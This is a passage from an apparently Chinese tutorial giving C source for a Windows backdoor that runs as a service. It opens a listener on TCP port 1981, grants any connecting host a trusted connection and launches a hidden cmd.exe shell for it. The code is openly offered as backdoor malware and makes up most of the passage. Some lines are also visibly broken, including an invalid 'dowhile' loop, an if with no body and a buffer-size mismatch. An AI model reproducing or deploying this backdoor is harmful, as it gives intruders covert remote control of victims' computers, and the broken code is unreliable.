//开始运行服务
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
ServiceStatus.dwCheckPoint= 0;
ServiceStatus.dwWaitHint  = 0;

SetServiceStatus(ServiceStatusHandle, &ServiceStatus);
//我们用一个事件对象来控制服务的同步
if (!(hEvent=CreateEvent(NULL, FALSE, FALSE, NULL)))
  return;

ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
ServiceStatus.dwCheckPoint= 0;
ServiceStatus.dwWaitHint  = 0;

SetServiceStatus(ServiceStatusHandle, &ServiceStatus);
//开线程来启动我们的后门程序
if (!(hThread=CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)MainFn, (LPVOID)0, 0, &dwThreadId)))


ServiceStatus.dwCurrentState = SERVICE_RUNNING;
ServiceStatus.dwCheckPoint= 0;
ServiceStatus.dwWaitHint  = 0;

WaitForSingleObject(hEvent, INFINITE);

CloseHandle(hThread);
ExitThread(dwThreadId);
CloseHandle(hEvent);

return;
}

　　上面我们调用了一个服务控制函数BDHandler()，由于只是简单的介绍，我们这里只处理服务停止控制请求的情况，其它暂停、恢复等功能，读者可以自己完善。下面是对BDHandler()的实现代码：
void WINAPI BDHandler(DWORD dwControl)
{
switch(dwControl)
{
case SERVICE_CONTROL_STOP:
//等待后门程序的停止
  ServiceStatus.dwCurrentState = SERVICE_STOP_PENDING;
  ServiceStatus.dwCheckPoint= 0;
  ServiceStatus.dwWaitHint  = 0;
  
  SetServiceStatus(ServiceStatusHandle, &ServiceStatus);
//设时间为激发状态，等待下一个事件的到来
  SetEvent(hEvent);
  
  ServiceStatus.dwCurrentState = SERVICE_STOP;
  ServiceStatus.dwCheckPoint= 0;
  ServiceStatus.dwWaitHint  = 0;
//停止
  SetServiceStatus(ServiceStatusHandle, &ServiceStatus);
  break;

default:
  break;
}
}

　　服务控制函数搞定了，下面就剩下主体的后门函数了。本程序借用了N多前辈翻写过了无数次的后门程序，通过开一个端口监听，允许任何与该端口连接的远程主机建立信任连接，并提供一个交互式Shell。为了代码清晰，我去掉了错误检查，整个过程很简单，也就不多解释了，黑防上都有N期介绍了，代码如下：
DWORD WINAPI MainFn(LPVOID lpParam)
{
WSADATA WSAData;
struct sockaddr_in RemoteAddr;
DWORD dwThreadIdA,dwThreadIdB,dwThreadParam=0;
PROCESS_INFORMATION processinfo;
STARTUPINFO startinfo;

WSAStartup(MAKEWORD(2,2),&WSAData);
ServerSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
RemoteAddr.sin_family = AF_INET;
RemoteAddr.sin_port = htons(1981);  //监听端口
RemoteAddr.sin_addr.S_un.S_addr = INADDR_ANY;

bind(ServerSocket,(LPSOCKADDR)&RemoteAddr,sizeof(RemoteAddr));
listen(ServerSocket, 2);

varA = 0;
varB = 0;
CreateThread(NULL, 0, ThreadFuncA, NULL, 0, &dwThreadIdA);
CreateThread(NULL, 0, ThreadFuncB, NULL, 0, &dwThreadIdB);

dowhile((varA || varB) == 0);

GetStartupInfo(&startinfo);
startinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
startinfo.hStdInput = hReadPipe;
startinfo.hStdError = hWritePipe;
startinfo.hStdOutput = hWritePipe;
startinfo.wShowWindow = SW_HIDE; //隐藏控制台窗口

char szAPP[256];
GetSystemDirectory(szAPP,MAX_PATH+1);

  strcat(szAPP,"cmd.exe");